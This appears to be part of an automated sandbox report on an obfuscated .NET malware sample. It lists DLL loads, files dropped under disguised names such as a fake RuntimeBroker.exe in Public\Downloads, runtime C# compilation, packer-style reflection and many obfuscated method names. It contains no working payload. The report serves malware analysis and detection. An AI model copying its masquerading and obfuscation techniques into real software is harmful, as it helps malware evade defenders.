Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: dpapi.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: secur32.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: schannel.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: mskeyprotect.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ntasn1.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ncrypt.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ncryptsslp.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: msasn1.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Directory created: C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Directory created: C:\Program Files\Microsoft Office 15\ClientX64\9da3c047e935b1 Jump to behavior
Source: W4tW72sfAD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: W4tW72sfAD.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: W4tW72sfAD.exe Static file information: File size 2079744 > 1048576
Source: W4tW72sfAD.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1fb400
Source: W4tW72sfAD.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.pdb source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: W4tW72sfAD.exe, EwV3ECxYhIse1SOarW.cs .Net Code: Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.L89zNPJrMt(16777336)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.L89zNPJrMt(16777247)),Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.L89zNPJrMt(16777264))})
Compiles C# or VB.Net code
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline"
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline" Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BA14ED4 push eax; ret 0_2_00007FFD9BA14ED5
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BC5AC30 pushad ; iretd 0_2_00007FFD9BC5AC31
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BC57BF2 push eax; iretd 0_2_00007FFD9BC57C91
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BC591FA pushad ; retf 0_2_00007FFD9BC59229
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BC629B5 pushad ; iretd 0_2_00007FFD9BC629B6
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BC501CE push cs; ret 0_2_00007FFD9BC501CF
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BC57964 push ebx; retf 0_2_00007FFD9BC5796A
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BC5F123 push eax; iretd 0_2_00007FFD9BC5F124
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BC5812C push ebx; ret 0_2_00007FFD9BC5816A
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BC53C61 pushfd ; ret 0_2_00007FFD9BC53C7A
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B8996D3 push FFFFFFE8h; ret 19_2_00007FFD9B8996F9
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B8C3B2B push eax; ret 19_2_00007FFD9B8C3B34
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B8C9E6A push eax; ret 19_2_00007FFD9B8C9E7D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B8C9DFA push eax; ret 19_2_00007FFD9B8C9E7D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 20_2_00007FFD9B8996D3 push FFFFFFE8h; ret 20_2_00007FFD9B8996F9
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 20_2_00007FFD9B8C3B2B push eax; ret 20_2_00007FFD9B8C3B34
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 20_2_00007FFD9B8C9E6A push eax; ret 20_2_00007FFD9B8C9E7D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 20_2_00007FFD9B8C9DFA push eax; ret 20_2_00007FFD9B8C9E7D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 21_2_00007FFD9B8B96D3 push FFFFFFE8h; ret 21_2_00007FFD9B8B96F9
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 21_2_00007FFD9B8E3B2B push eax; ret 21_2_00007FFD9B8E3B34
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 21_2_00007FFD9B8E9E6A push eax; ret 21_2_00007FFD9B8E9E7D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 21_2_00007FFD9B8E9DFA push eax; ret 21_2_00007FFD9B8E9E7D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B8C3B2B push eax; ret 22_2_00007FFD9B8C3B34
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B8C9E6A push eax; ret 22_2_00007FFD9B8C9E7D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B8C9DFA push eax; ret 22_2_00007FFD9B8C9E7D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B8996D3 push FFFFFFE8h; ret 22_2_00007FFD9B8996F9
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B8B797E pushad ; retn 5F4Bh 22_2_00007FFD9B8B7AAD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9B76D2A5 pushad ; iretd 23_2_00007FFD9B76D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9B880580 pushad ; retf 23_2_00007FFD9B8805ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_00007FFD9B77D2A5 pushad ; iretd 24_2_00007FFD9B77D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_00007FFD9B89C2C5 push ebx; iretd 24_2_00007FFD9B89C2DA
Source: W4tW72sfAD.exe, 2Rq.cs High entropy of concatenated method names: 'Q51', 'of3', '_5s2', '_15N', '_6N4', '_296', 'd63', 'RGh', 'I46', '_7E1'
Source: W4tW72sfAD.exe, EwV3ECxYhIse1SOarW.cs High entropy of concatenated method names: 'c7Fg8tchQDAZE4INO3v', 'uHWS0BcyPmgmFY6ysAx', 'BPTavEfPI8', 'JV2ua5cNOro8egkKsWF', 'w24HmVc7PjtFJJtXI4t', 'bgW9OactUjdXdWLKPQq', 'HyO1cjcdqmXEkhQowD1', 'DSegNscfigTrSBwmZJL', 'z32YtXcuxv3t71Wh2PI', 'NM93iKc8vsfuuiDhPPj'
Source: W4tW72sfAD.exe, 9tn.cs High entropy of concatenated method names: 'dO4WBHb1ySHiBZsgmm6', 'ul6GRYbDedgfrmd8bcV', 'HNu2dRbcRWx0UnYu9sL', 'EcLDKsbrXecemheStbD', 's8jvAhbojPvayBVO5Tu', '_8x6', '_1R8', '_3eK', '_1ly', '_216'
Source: W4tW72sfAD.exe, QD5.cs High entropy of concatenated method names: 'v9g', '_9q4', '_831', '_1C5', '_1jS', 'zxRAkbWcvk8Ilog36jy', 'SdcBImWrB1UMEqhA159', 'hCAX09W1E05tgoaDwvY', 'IAqMRIWDpUNuA6Q0Nka', 'nDi3cjWoLMohy8Fb7QD'
Source: W4tW72sfAD.exe, cp1.cs High entropy of concatenated method names: '_567', '_5yt', '_3Q9', '_5V4', '_5FV', 'ode92udDPHEgFTm1p1e', 'djFM0RdoTrOi4YcN66n', 'FXtKeIdreN3Yx5OcboN', 'OEnm3ud1QDlAdOJFQZ7', 'TJ9Ltbd5tPBP5NPp0NP'
Source: W4tW72sfAD.exe, dm4.cs High entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
Source: W4tW72sfAD.exe, mY8.cs High entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'q1P', '_947', '_2pM', '_12R', '_1f8', '_71D'
Source: W4tW72sfAD.exe, a65.cs High entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'y73', '_8h4', 'nChrdP9lAfdlAA6fP6t', 'XPxSf39HhqddcYGMk9F', 'KlH9k19AMSAbnvYD3pm'
Source: W4tW72sfAD.exe, m4d.cs High entropy of concatenated method names: 'ffp', 'Ao2', 'qw4', 'ioE6dPTHOKVe7wKuj1F', 'f3dTkoTAORQ27UG8axe', 'wcUFIYTgRBjGBf4O8PE', 'et5tFoTl5asl6GkMb7p', '_3hL', 'Y6e', 'ah8'
Source: W4tW72sfAD.exe, 56I.cs High entropy of concatenated method names: 'ODM6APtRZbJ8uuKoj9R', 'AhAmmWtVMrsJqdC7bE2', 'habMQwtMSubMkNZXvip', 'hBLeeet2psJWxk8T07I', 'BfdmcKtnrO8nGE6ZWTp', '_7kT', '_376', 'B28', '_373', '_4p5'
Source: W4tW72sfAD.exe, sn1.cs High entropy of concatenated method names: '_2iL', '_9Y6', '_7Bm', 'thf', '_3j1', 'IFL', 'z4c', 'A4gNTlWsh3GEevms8wd', 'Qwre61WeWtHwWMrsa8L', 'YiM7rhWi6hnurkKxFaX'
Source: W4tW72sfAD.exe, 136.cs High entropy of concatenated method names: '_47i', 'A3wtUb0dsTCZQ8Zq877', 'gEXgdM07ocnUd7vpT5r', 'ReJcwT0tFI1AHdvZ452', 'qV9hFW0fKsqDQshHTRl', 'i5X', '_44S', 'W93', 'L67', '_2PR'
Source: W4tW72sfAD.exe, 18H.cs High entropy of concatenated method names: '_55d', '_64r', '_69F', '_478', 'J4c', '_4D8', '_645', '_5BW', '_4qr', '_16d'
Source: W4tW72sfAD.exe, N43.cs High entropy of concatenated method names: '_8l4', 'AHX', '_2fh', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'p4w'
Source: W4tW72sfAD.exe, 1y4.cs High entropy of concatenated method names: 'AEm', 'by1', '_7Sc', 'uM7', '_197', 'rZu', 'Q1J', '_24u', 'U67', 'xj7'
Source: W4tW72sfAD.exe, s67.cs High entropy of concatenated method names: 'w43', 'nZ5D4klzVr8vWTPMtMF', 'aZmKDdlqkwPhqmOjv2M', 'rmB4LtlEgtke4r08RSs', 'w2wx9EHeT0RWk4GfgLS', '_6Yf', 'BGIPbklcfkiMdxvjcZs', 'r6YJ8olrqlcZHHTlYZ1', 'aReZ6Xl1G1BN4rVnPhc', 'l7hyDdlDYkQs1RZRpsW'
Source: W4tW72sfAD.exe, B6D.cs High entropy of concatenated method names: '_7as', 'dxy', '_8Kv', '_3c8', '_94E', '_31e', '_0023Nn', 'Dispose', 'G1ZYj0wV1GbTKYPe9KU', 'WMUAh6wMcEPijdGieiV'
Source: W4tW72sfAD.exe, 8B6.cs High entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'P3U', 'j47', 'q8m1y4TB09gd3k34yQi', 'aFfbiaTpQhV2yM7uqD5', 'bd3NbJTjttZdnHdwkEt', 'mw8VPtTWH87mb7MY1Hf', 'vOjTvITU20VjjNAXgmb'
Source: W4tW72sfAD.exe, 1a2.cs High entropy of concatenated method names: '_4c9', '_22S', '_6q7', 'I7kxd9lTqb9tbAuruEk', 'DGlvEQlv6puZAxCX2g6', 'Odv3WhlHRXFmsCb8jcH', 'q3VgkYlAvKJGjhkOjuY', 'LPyDeZlIy422DgIJlHM', 'p73', '_79A'
Source: W4tW72sfAD.exe, 9r9.cs High entropy of concatenated method names: '_7K2', '_425', '_15J', 'aDDv0SY6mw61Et33gZH', 'GhInq6YagYRUxvtGlvd', 'RQ6uMEYGIg5mNo8KTlv', 'A0dgDlYmYTdBdsadTWq', 'tnd0opYksrH7x0rJCZn', '_81V', '_425'
Source: W4tW72sfAD.exe, 2A1.cs High entropy of concatenated method names: '_25r', 'h65', 'NY9', '_1vl', '_728', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
Source: W4tW72sfAD.exe, 7d5.cs High entropy of concatenated method names: 'aVj', 'Uk82aFkP2W09Q7ycNBY', 'Xp8EnpkJIW35bi9y24Y', 'f5Zg30kVZFy9NqKpqWw', 'njCEoukMDximPXNidTO', 'CPX', 'h7V', 'G6s', '_2r8', 'l39'
Source: W4tW72sfAD.exe, L32.cs High entropy of concatenated method names: '_3z1', '_171', 'C6s', '_61p', '_0023Nn', 'Dispose', 'dDyLRlwaWjh99uC5uJN', 'EGRiJMwmIc8XZGSGT5Z', 'zcxAtyw67flcKFd5OtA', 'ceKZMGwkcDbGqJeM0qk'
Source: W4tW72sfAD.exe, wnO.cs High entropy of concatenated method names: 'hI2', 'Y1OCypdIjptGMD6VNEv', 'KdOaUGdhvH3CrWn1BHr', 'F3jhQhdTcK8WwsUN8Rm', 'mbdULidvylU99kdFH9t', 'OmoU5ndyet3MygNAYlj', 'x4G', '_61h', 'PC5', 'pL7'
Source: W4tW72sfAD.exe, E32.cs High entropy of concatenated method names: '_9O1', 'jMp', 'vTF', 'XcH', '_13h', 'k22', '_4tg', 'wk8', '_59a', '_914'
Source: W4tW72sfAD.exe, m9F.cs High entropy of concatenated method names: '_7Ch', 'j31', 'j7q', 'uKJld8XZrOQERj7b3EL', 'C8OkaVX9wSax66ZPGFU', 'G53kUEXiemATyOnxPH9', 'YfjynVXsKHZAfPDCB3R', 'Hn5', '_273', '_223'
Source: W4tW72sfAD.exe, T1A.cs High entropy of concatenated method names: 'aRT', '_1n3', 'y6v', 'v8PLgctph85VlW6Q2IG', 'gYZDkxtjkOD0cbW7T9G', 'U2fOjttJVw9mdwqZtDY', 'tX34CqtBXFDwtym4teI', 'mQFByvtW9nXSMY4FpOh', 'AKL0pbtUDiNvLkJsPVp', 'Aubn2itbwkJdFScmXdf'
Source: W4tW72sfAD.exe, 7w3.cs High entropy of concatenated method names: 'F7d', 'TR1m9VQIl7Mp5wuE1f8', 'AuC29lQhfAkE84lgkfh', 'VtiepQQTT77tFMw4oRe', 'lOuSDuQvB91U6naUwAr', 'D7eO9lQypoI4VSyACqS', 'GDMnDbQXZsrALl4X0UY', 'UU8', 'd65', '_62b'
Source: W4tW72sfAD.exe, 67K.cs High entropy of concatenated method names: '_8zr', 'ssF', 'AhC', 'Gzl', 'GTHZCeAuUIfYuvDvDqj', 'xZtrWOA827EHuknviln', 'SeAfRFAdutXETlQkGnx', 'WfDdIKAfrlqpoQnA0U8', 'V5ySVYA3YHW64PuVmHh', 'l2IqaJA2XWrMmMq5766'
Source: W4tW72sfAD.exe, 556.cs High entropy of concatenated method names: 'n38', 'BTPZ4DQc0LlXZIgZmj2', 'rE7eiQQrPx5jDXuura5', 'SCYMtkQSNcVkR6bPArt', 'jlS9XyQKJXoGj4jOdUb', 'q9k7r2Q1NgB2yDsjAov', 'eq7', 'd65', '_43O', 'mI1'
Source: W4tW72sfAD.exe, gY4.cs High entropy of concatenated method names: '_5t1', 'd65', '_2rM', 'H87', '_1a3', '_2r8', '_851', 'dy8OK3NCGcFmHFhlHal', 'H1kx8qNFe9m5pFQt1oH', 'xJHeFTNgimTucHDwNjb'
Source: W4tW72sfAD.exe, 624.cs High entropy of concatenated method names: 'Yi3', '_492', '_975', '_2Kd', 'VWSowQNJlyF5M3ZpRfi', 'RQKCmrNBa4D97cTU1Di', 'waZ04cNpZCcZePUyMtM', 'XR9BYONM9Vhy4IjPCwB', 'zc3JMFNPRGti15H9EIw', 'ExlnqLNjICCYnBdMId6'
Source: W4tW72sfAD.exe, H62.cs High entropy of concatenated method names: '_46E', 'd65', '_7sJ', 'IiX', '_851', '_267', 'yVeQe4QJEnySrA863ew', 'xnejYaQBNvGFogYcow2', 'tl1QljQpUbJZ4ybJeW3', 'tAyiKqQj3ITYaoaSyC8'
Source: W4tW72sfAD.exe, 3u3.cs High entropy of concatenated method names: 'SwUtcD6UD7X7a2BB8sX', 'UFWYWs6bAZSiBj8lTHy', 'dbTPFF60mdywj2SJIhK', 'FH0Uep6jwE9d2NTj9Sr', 'ExU9A16WxsNHAJqaHZh', 'XZhQ0U6PdpId8xIvtVj', 'aZ9Nol6J4v4VfdT9XB6', 'fq056A6BBmBBWFArRTg', 'XCXY2r6VydwLPb05ibx', 'hWqpor6Mdlx291mWtEI'
Source: W4tW72sfAD.exe, 231.cs High entropy of concatenated method names: '_9b1', '_8op', '_4Xs', '_885', '_74i', 'r8N', '_3Lk', 'Htz', 'J52', 'BV1'
Source: W4tW72sfAD.exe, Ed2.cs High entropy of concatenated method names: '_8X5', 'd65', 'F1q', '_67U', 'kW7', '_851', 'Eh3bF2Q3be7mSsCreBK', 'cCUhmxQ2NZF2A5qyEn7', 'KuAH76QnNTADbKcJNPd', 'veuolqQuPlkkjWHyPJg'
Source: W4tW72sfAD.exe, QW6.cs High entropy of concatenated method names: 'vI2', '_9gU', '_63P', 'hn3', 'Fd4', '_9eJ', '_9W7', 'FtpM2TLX4qxBfYvNcyb', 'eb2Ue5LLZBPR5vjMHpB', 'oI7sK1LQQKQT6wR1s1I'
Source: W4tW72sfAD.exe, geUwbRLwd0WNm7K3QP.cs High entropy of concatenated method names: 'AUFzX9bS1O', 'MyNiDIciY0c3IYtMr94', 'CoUZ0Ncsm5TomLOPjqP', 'VaGynZcZPyiv6oDBQyq', 'B5WxrMc9Kfe2JGk6DsK', 'y2BJ4mcClYD009G4HNi', 'UBKKufKzev9HatByLmt', 'cdwF5dceksDnnWBPET5', 'wITIjdcFEqc0fOX0P1C', 'HqOOKtcg9xscR0V6h95'
Source: W4tW72sfAD.exe, j11.cs High entropy of concatenated method names: '_18q', 'FKm15RsXXePwq3MLTKa', 'xK0umUsLcWcCWxBRqtr', 'CJHnEpshwOKGFZ8lKUD', 'I2il1LsyYxUyg8Z4Chn', 'UdXhvMsQ97fq6FxiFRo', '_5N9', 't27', 'm4U', 'x67'
Source: W4tW72sfAD.exe, i1D.cs High entropy of concatenated method names: 'U94', 'yxoMpryPXHLA3UQSELu', 'SfFfDsyJJZ9jTED8Rv0', 'D7MuMHyBxnMk2GpvrJs', 'gPO7J4yV1KiWXPv3dTV', 'EXq4NdyMfM7Qw0vlKYL', 'Icyi4vypURktyA5GnqW', '_7F4', 'i21JbiytYfIpoVn9y4b', 'jAI2l0yd3eXPLLIwMFH'
Source: W4tW72sfAD.exe, 2L3.cs High entropy of concatenated method names: 'WJy', 'L71', '_285', '_653', 'DcU', 'OQv6S2JqsoKVK0DkBlp', 'OH5VP2JEG1uYdOOy6Hu', 'EanQexJxpfGxkYOdiM5', 'Nq14MgJOxBK4E9T1Yn4', 'P7QvPyJzy4YG8oNmQfW'
Source: W4tW72sfAD.exe, 655.cs High entropy of concatenated method names: 'M4n', 'rd6', 'cYGxb2FgwNfGI1WSBAZ', 'nofOsIFCjLToqjJFJ8F', 'KjfLutFFxhcgikRVTHg', 'XjpOVfFl9UJSrgJSKI5', 'tawKOfFHZHa5a8eeKuV', 'imEdYWFAMwfZDW7qULl', 'QhSDe4FTZHP9iet4et0', 'CZfgZ5Fv9lBI3Wq7Pxf'
Source: W4tW72sfAD.exe, 954.cs High entropy of concatenated method names: 'kF1', '_757', 'NMKxrCJhYqjiJYKLO1P', 'EAQqmvJy2gmvvRgntQR', 'j7jtoAJXdM30x2sg2FO', 'eR8Xd1JLnhjpblKanoP', 'Tqc35cJQJx3tmedx3Zk', 'Fgcso3JNO4hlh9kFcsm', 'ox8ClZJ7bLedmFhtZrl', 'VA86CxJtPVUCipwEE7f'
Source: W4tW72sfAD.exe, OBqe2IUAeSpOmlOQ4O.cs High entropy of concatenated method names: 'nOQdl4ODOg', 'tY3dXGtH5f', 'q9qdvQao7g', 'DpYddoq5nS', 'vUcduRRnlL', 'sqedUSL72O', 'MNddRugcTR', 'd6IBJRRp2Z', 'c8idQhNv3S', 'V1kdEyl02V'
Source: W4tW72sfAD.exe, 3J8.cs High entropy of concatenated method names: 'L2l', 'Jo5', '_2EF', 'i4P', '_6c7', '_77i', '_38r', '_142', 'Xhv', 'eT3'
Source: W4tW72sfAD.exe, yW3.cs High entropy of concatenated method names: 'ZF7', 'XPR', 'ID35sFAbwgY5fOFUjnP', 'jgJOaMA0njiV5YywCbY', 'HUuWmdAWL0d3wH2PNfU', 'Ac0dqSAU18iBhQNO2Vd', 'Jk9ILTAGWAFt091RHtv', 'UnUC3JAm1XDWQHwJEDM', 'mv18tPA6UEtpCow5FCE', 'cN49y4Aa4mc5TlOhHPn'
Source: W4tW72sfAD.exe, itVrv600AOcMBhsiIT.cs High entropy of concatenated method names: 'xdJaHaLaiy', 'V2DaSkpaDo', 'ojWablkBNc', 'DyHamcAFke', 'ArCa6Di0WB', 'EJyataZqWW', 'T7haJgpFAl', 'kNGa25aRtf', 'lj7acrWjTB', 'PYIahvCHho'
Source: W4tW72sfAD.exe, 11M.cs High entropy of concatenated method names: 'P5u', '_434', '_53T', '_7g1', 'b6C', 'lMUrcZfUC0PuryVeJFp', 'GiaNpSfbRxoUsRcCwBd', 'tDQPvVfjcbjqxhhBZNL', 'gm2URDfWTm6ntfesfGY', 'iUS6Auf05HyfbmjcZgN'
Source: W4tW72sfAD.exe, 7p3.cs High entropy of concatenated method names: '_0023Nn', 'Dispose', '_89Q', 'kwo', '_8y8', 'DIw9xxThJ2cUIpMKYEY', 'qYkscVTyhguaT4kMHtr', 'xec7mfTvpjWKLx5aOUF', 'KoqOY9TITogJB7Zf4Dc', 'lnVK6LTXiZyuO0qrsSn'
Source: W4tW72sfAD.exe, Z57.cs High entropy of concatenated method names: 'n39', 'V29', '_4yb', '_2Q4', 'p93', '_43v', '_8h4', 'ylOoUg9mECRXBpfpBGS', 'y58JLD96Xe77pXZ6cv8', 'mul5uP9aJlcF9WfRqQ6'
Source: W4tW72sfAD.exe, ifL.cs High entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', '_5I1', '_1v2', 'gY2', 'rV4', '_28E'
Source: W4tW72sfAD.exe, W1w.cs High entropy of concatenated method names: '_6L3', '_3Ev', 'M8uPqhIXHl0Kc0fnJqq', 'slxmxiILCmUdQqr2Jw6', 'w6YgX0IhvlsK8sd5T7p', 'hP2n3qIyN48WrAQdH5K', 'yVO443IQtgxhgK1Trn0', '_87m', '_5Dz', 'qTpUJeITcf2lKK6beyQ'
Source: W4tW72sfAD.exe, 26v.cs High entropy of concatenated method names: 'Ik8', '_6PE', '_544', 'AlygZ6h6vM8NyUCJ3wG', 'eBfeythaU2Yl7oRtNHu', 'Udj57yhGmFP7VE3ES4N', 'HF9p3ZhmHGi6H3yyShu', '_6iD', 'PUk', '_5x3'
Source: W4tW72sfAD.exe, 64r.cs High entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', '_124', 'so6PkgkKPQePHRr6Vru', 'z8pH4DkcPskE2NdXEjk', 'Ug2Wbmkr5ucKfsYWjB0', 'Rh6SlSk1BpfxGH6cDK2', 'MQZAwBkDwUsLHrlyDfm', 'bxHRaGkoJrnygJU6BxT'
Source: W4tW72sfAD.exe, TZ2.cs High entropy of concatenated method names: 'My5', 'V4X', 'zT6', '_457', '_1in', '_2rC', '_8j5', 'jsoM8O72YjiTRpv2DD8', 'aI5akg7nA8vlFvjCEVU', 'vghCtE78J16Kn27t2lA'
Source: W4tW72sfAD.exe, 7O8.cs High entropy of concatenated method names: '_93a', '_383', '_4w4', 'W2J', 'JX4', '_13F', 'XLI', '_64n', 'CdD', '_2y7'
Source: W4tW72sfAD.exe, jv4.cs High entropy of concatenated method names: '_1ay', 'V29', 'FLl', 'QUh', '_2Q4', '_68a', 'S2i', '_8h4', 'wMuvaBZq5MLYGByXsAb', 'oHBV91ZERXcJ5i0j5fv'
Source: W4tW72sfAD.exe, 781.cs High entropy of concatenated method names: '_54f', 'd65', '_917', 'HI7', '_119', '_851', 'ii6HgDLUDUMxKKsxe1c', 'ywVqCuLb1HMYAi9Lw0g', 'GFOxjcL0EKZsj2KIE9v', 'YXnuJWLjQpCy7xaFlQK'
Source: W4tW72sfAD.exe, 9EL.cs High entropy of concatenated method names: '_2SY', '_589', '_853', '_16O', 'ojwemcNGwQdPKBicMKV', 'CI1aGsNmhomY3L7FtHu', 'ca9DYgNb2tb5iWSqRJj', 'hTcsS7N0qxwZJf90voF', 'MZvahXN6UU8p5enY4YS', 'zgiHRENaBiVtRXlAAac'
Source: W4tW72sfAD.exe, eh3.cs High entropy of concatenated method names: '_5xP', 'f34', '_37Q', '_294', 'S8l', '_517', '_3A6', '_29Q', '_51Q', 'acq'
